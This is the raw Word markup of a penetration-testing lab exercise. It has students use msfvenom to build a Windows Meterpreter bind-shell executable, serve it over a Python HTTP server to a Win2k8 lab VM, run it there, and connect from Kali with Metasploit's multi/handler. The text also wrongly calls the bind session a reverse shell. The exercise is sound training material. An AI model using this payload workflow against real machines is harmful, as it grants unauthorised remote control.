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8F8D" w14:textId="4DC5BB8C" w:rsidR="00605C07" w:rsidRDefault="005539B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005539B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Lab - Us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5539B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Msfvenom </w:t>
      </w:r>
      <w:r w:rsidR="00310FEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>to Create a BIND Shell</w:t>
      </w:r>
      <w:r w:rsidR="00530648">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E25AE0" w14:textId="17E100D0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DE8E974" w14:textId="2C76C2E3" w:rsidR="007C03D0" w:rsidRDefault="00530648">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00530648">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">A bind shell is a kind </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>of shell that</w:t>
      </w:r>
      <w:r w:rsidRPr="00530648">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F41B28" w:rsidRPr="00530648">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>opens</w:t>
      </w:r>
      <w:r w:rsidRPr="00530648">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a new service on the target machine and requires the attacker to connect to it </w:t>
      </w:r>
      <w:r w:rsidR="004426E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00530648">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> get a session</w:t>
      </w:r>
      <w:r w:rsidR="004426E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8C92D7" w14:textId="72C4C113" w:rsidR="007C03D0" w:rsidRDefault="007C03D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C03D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Msfvenom is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>command-line</w:t>
      </w:r>
      <w:r w:rsidRPr="007C03D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance of Metasploit used to generate various </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payloads for shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="007C03D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> available in Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA3147D" w14:textId="5B63DF98" w:rsidR="007C03D0" w:rsidRDefault="007C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2185C3AE" w14:textId="54BA52DF" w:rsidR="007C03D0" w:rsidRPr="0052718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0B0A0C62" w14:textId="4A4C2955" w:rsidR="007C03D0" w:rsidRDefault="007C03D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 w:rsidR="008B707A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (password: </w:t>
      </w:r>
      <w:r w:rsidR="008B707A"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="008B707A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28318992" w14:textId="56282C5E" w:rsidR="00527180" w:rsidRDefault="00527180" w:rsidP="0052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51BED847" w14:textId="72E5D046" w:rsid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B6DB" wp14:editId="2013CEEC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6DA8" w14:textId="37F9E4EC" w:rsidR="00530648" w:rsidRPr="00530648" w:rsidRDefault="00530648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 w:rsidR="004426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7410C7" w14:textId="3358EF4F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Logon on to your Win2k8 target machine as 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49352B8D" w14:textId="012FF00A" w:rsidR="008B707A" w:rsidRDefault="008B707A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a desktop, open a command prompt, and at the prompt</w:t>
      </w:r>
      <w:r w:rsidR="002013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2FADC72E" w14:textId="6EE359B8" w:rsidR="00992A65" w:rsidRDefault="00992A65" w:rsidP="005271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67D7AC" wp14:editId="42CFDACE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4DE" w14:textId="21A86A85" w:rsidR="00D91E0A" w:rsidRPr="00D91E0A" w:rsidRDefault="00D91E0A" w:rsidP="00527180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</w:p>
    <w:p w14:paraId="061B04EC" w14:textId="5774E7CD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lastRenderedPageBreak/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3AED95F7" w14:textId="7C7CDA68" w:rsidR="00992A65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A7A37" wp14:editId="35488560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1A6D" w14:textId="3BF7EC93" w:rsidR="008B707A" w:rsidRPr="00527180" w:rsidRDefault="00992A65" w:rsidP="0052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Ctrl+C keys on your keyboard. If you do not have a positive response, set your VirtualBox adapters to Host-only adapters and try again. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D29E60C" w14:textId="77777777" w:rsidR="00527180" w:rsidRP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527180">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Abbreviations</w:t>
      </w:r>
      <w:r w:rsidRPr="00527180">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6B48F3" w14:textId="7777777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Lhost= (IP of Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDA9660" w14:textId="00C2AF1A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Lport= (Assigned to the listener)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C7C3B5" w14:textId="7FC50247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P= (Payload type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BABC0A1" w14:textId="0626BE96" w:rsidR="00527180" w:rsidRPr="00992A65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992A65">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>F= (file extension</w:t>
      </w:r>
      <w:r w:rsidR="00992A65">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> type</w:t>
      </w:r>
      <w:r w:rsidRPr="00992A65"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4A32214A" w14:textId="5E3AE6E4" w:rsidR="00527180" w:rsidRDefault="00527180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527180">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Begin the lab! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B8A361" w14:textId="5784B7FD" w:rsidR="00527180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="00527180" w:rsidRPr="008B707A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> your Kali </w:t>
      </w:r>
      <w:r w:rsidRPr="008B707A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>desktop, right-click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and create a new folder and name that new folder, ShellCodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBD34A1" w14:textId="7153C8AB" w:rsidR="008B707A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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36462FD3" wp14:editId="371F0FDB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C09" w14:textId="2718661C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 on the new folder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and from the context menu, select Open Terminal Here. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001AB36B" w14:textId="176A4055" w:rsid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7F885759" wp14:editId="058FA627">
            <wp:extent cx="1752600" cy="17059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CD6D" w14:textId="799295CC" w:rsidR="00992A65" w:rsidRDefault="00992A65" w:rsidP="0052718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>Create a Bind shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0789A800" w14:textId="2CCECF85" w:rsidR="00992A65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013D9">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Write or copy and paste the following code at the terminal prompt at your Kali terminal</w:t>
      </w:r>
      <w:r w:rsidR="00992A65" w:rsidRPr="00992A65">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AA5F41" w14:textId="3C749AD9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241494">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/bind_tcp -f exe &gt; /root/Desktop/</w:t>
      </w:r>
      <w:r w:rsidR="00434D86">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ShellCodes/</w:t>
      </w:r>
      <w:r w:rsidRPr="00241494">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bind.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1023CD78" w14:textId="7F27FFEA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241494">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Press enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C91B868" w14:textId="15103F6C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After a short pause, the payload is generated and saved inside our working folder. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550CCD51" w14:textId="3DB02751" w:rsidR="00241494" w:rsidRDefault="00241494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60EEDD0C" wp14:editId="742EA363">
            <wp:extent cx="59436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1157" w14:textId="585EAA81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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C7F1609" wp14:editId="427D34C8">
            <wp:extent cx="5334744" cy="2162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C80" w14:textId="538EED87" w:rsidR="00BE1FCC" w:rsidRDefault="002013D9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You must figure out</w:t>
      </w:r>
      <w:r w:rsidR="00BE1FCC">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> how to get the payload delivered to the Win2k8 target. The quick, down, and dirty way is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>to use Python</w:t>
      </w:r>
      <w:r w:rsidR="00BE1FCC">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create a simple HTTP server to run inside our working folder that defaults to port 8000. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEE4D96" w14:textId="2C1AC24D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 xml:space="preserve">We need to have this simple HTTP server run inside our working folder where the payload is located. </w:t>
      </w:r>
      <w:r w:rsidR="004426E9">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="002013D9" w:rsidRPr="002013D9">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> right-click on the working folder and select Open Terminal Here from the context menu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C01B2B6" w14:textId="77037B8A" w:rsidR="00F87A52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At the prompt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</w:t>
      </w:r>
      <w:r w:rsidR="00F87A52">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8122CB" w14:textId="3831ABB0" w:rsidR="00BE1FCC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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F87A52">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>python3 -m http.server</w:t>
      </w:r>
      <w:r w:rsidR="00BE1FCC">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649441EC" w14:textId="5C7C8F4B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7E83A601" w14:textId="31920C69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F87A52">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32CB3ED7" wp14:editId="33D473E6">
            <wp:extent cx="4533900" cy="6398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95" cy="6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BA8" w14:textId="6B7B3814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The </w:t>
      </w:r>
      <w:r w:rsidR="004426E9">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HTTP server terminal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> must be left open though it can be minimized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275EA03B" w14:textId="20430AD8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From the desktop of your Win2k8 target machine, click on the Start button and launch Internet explorer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4703D147" w14:textId="5BA761E8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the address bar</w:t>
      </w:r>
      <w:r w:rsidR="002013D9">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> type the IP address of your Kali machine followed by a colon (:) and the port number used by the HTPP server, 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E061DD" w14:textId="3DF0BDAC" w:rsidR="00BE1FCC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049B7AD5" wp14:editId="3A75A85F">
            <wp:extent cx="4505325" cy="13790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62" cy="139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323F" w14:textId="2DF45A3D" w:rsidR="00F87A52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Right-click</w:t>
      </w:r>
      <w:r w:rsidR="00F87A52">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the payload and </w:t>
      </w:r>
      <w:r w:rsidR="002013D9" w:rsidRPr="002013D9">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">select, Save Target As from the </w:t>
      </w:r>
      <w:r w:rsidR="002013D9">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>context</w:t>
      </w:r>
      <w:r w:rsidR="002013D9" w:rsidRPr="002013D9">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> menu</w:t>
      </w:r>
      <w:r w:rsidR="00F87A52">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> The payload will be saved to the Downloads directory. Do not launch the payload yet! We first have to setup up a Meterpreter session on our Kali machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE24F71" w14:textId="7E329DF8" w:rsidR="00F87A52" w:rsidRDefault="00F87A52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460E6814" wp14:editId="3F9BFD19">
            <wp:extent cx="4082837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37" cy="21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7F35" w14:textId="5B80E3F9" w:rsidR="00CD41FA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lastRenderedPageBreak/>
        <w:t>On</w:t>
      </w:r>
      <w:r w:rsidR="00CD41FA">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> your Kali machine, open a new terminal at the prompt type </w:t>
      </w:r>
      <w:r w:rsidR="00CD41FA" w:rsidRPr="00CD41FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="00CD41FA">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C0B5E6" w14:textId="77777777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Press enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260F0163" w14:textId="5E49774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CD41FA">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28B4FBB9" wp14:editId="4229A9FF">
            <wp:extent cx="2991267" cy="800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EC5" w14:textId="6CCCDCD8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At the msf prompt, type the following commands one at time. Press enter after each command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B409401" w14:textId="77777777" w:rsidR="00CD41FA" w:rsidRPr="00CD41FA" w:rsidRDefault="00CD41FA" w:rsidP="00CD41FA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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</w:pP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msf &gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277ADF41" w14:textId="77777777" w:rsidR="00CD41FA" w:rsidRPr="00CD41FA" w:rsidRDefault="00CD41FA" w:rsidP="00CD41FA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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</w:pP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msf exploit(handler) &gt; set payload windows/meterpreter/bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD381E1" w14:textId="13B2B28A" w:rsidR="00CD41FA" w:rsidRPr="00CD41FA" w:rsidRDefault="00CD41FA" w:rsidP="00CD41FA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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</w:pP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msf exploit(handler) &gt; set rhost 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="008F073E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56</w:t>
      </w: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.10</w:t>
      </w:r>
      <w:r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 xml:space="preserve">3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602A503B" w14:textId="77777777" w:rsidR="00CD41FA" w:rsidRPr="00CD41FA" w:rsidRDefault="00CD41FA" w:rsidP="00CD41FA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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</w:pPr>
      <w:r w:rsidRPr="00CD41F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  <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>msf exploit(handler) &gt; set lport 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A41486D" w14:textId="313951FB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D41FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8F8"/>
        </w:rPr>
        <w:t>msf exploit(handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0ADA94" w14:textId="24A1556E" w:rsidR="00CD41FA" w:rsidRDefault="00CD41F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CD41FA">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve">Our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali is listening on port 4444 for a request from </w:t>
      </w:r>
      <w:r w:rsidR="008F073E">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8F8"/>
        </w:rPr>
        <w:t>our target to establish a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C572664" w14:textId="4A3AAF43" w:rsidR="008F073E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D91E0A">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="486274EE" wp14:editId="5C91E02E">
            <wp:extent cx="59436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66F8" w14:textId="4A6AA00E" w:rsidR="008F073E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Return to the W2k8 target, </w:t>
      </w:r>
      <w:r w:rsidR="002013D9" w:rsidRPr="002013D9">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>open the Downloads folder using file explorer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, and x2 click the bind,exe file we previously uploaded to the server</w:t>
      </w:r>
      <w:r w:rsidR="00D91E0A">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (you cannot see the file extension).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C750E7" w14:textId="0FE131FF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35308E51" wp14:editId="20DB15D4">
            <wp:extent cx="4162425" cy="1743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1013" w14:textId="70F969A3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 xml:space="preserve">Once we run the payload and if everything is configured correctly, we will have established a meterpreter session. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681AD102" w14:textId="5597F25B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5414F09A" wp14:editId="3F53B858">
            <wp:extent cx="5267325" cy="222848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16" cy="22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60FB" w14:textId="3A512C0C" w:rsidR="002013D9" w:rsidRP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2013D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Summary –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D3DCBC" w14:textId="712334EC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In this short lab, you learned how to use Msfvenom to generate a BIND shell payload</w:t>
      </w:r>
      <w:r w:rsidR="004426E9">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007545F1">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007545F1">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> learned how to use Python</w:t>
      </w:r>
      <w:r w:rsidR="007545F1">
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to start a simple HTTP server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3E4285" w14:textId="6704F49D" w:rsidR="002013D9" w:rsidRDefault="002013D9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color w:val="4C4F53"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>End of the Lab!</w:t>
      </w:r>
    </w:p>
